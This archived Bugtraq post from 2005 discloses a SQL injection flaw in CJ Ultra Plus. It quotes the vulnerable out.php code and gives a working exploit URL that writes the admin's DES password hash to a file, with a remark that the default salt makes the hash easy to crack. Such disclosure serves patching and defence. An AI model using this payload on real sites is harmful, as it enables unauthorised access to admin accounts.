lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 5 May 2005 23:00:32 -0000
From: Kold <maggik@...a.net>
To: bugtraq@...urityfocus.com
Subject: Sql Injection in CJ Ultra Plus v1.0.3-1.0.4




################################################# 
#               ADVISORY                        #
#Sql Injection in CJ Ultra Plus v1.0.3-1.0.4(?) #
#################################################
"My God, it's full of stars" - (c) MwNN



Vulnerable code is in out.php

<---code begin-->
...
if (isset($perm)) {
	$query = "select a1, a2 from trade where a1 = '$perm'";   <-muhahaha
	$result = mysql_query($query);
	if(!$result) error_message(sql_error());
...
<---code end---->

So...

Exploit:

/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/*

And you will get x.txt with something like that inside:

<--BEGIN-->
aaQSqAReePlq6 aaQSqAReePlq6
<___EOF___>

This is crypt()'ed in DES password for admin panel.
The SALT is 'aa' for default, so you won't get any troubles with decryption.

Greetz to: 0xdeadbabe(i luv u, br0w), foster(daddy!), mestereeo(br0w! :)), GHC, unl0ck(Eagalito!), raistlyn, .dtors & others.

Contact me: [maggik `at` gala `dot` net]
ISeekU:     [3316667]


Powered by blists - more mailing lists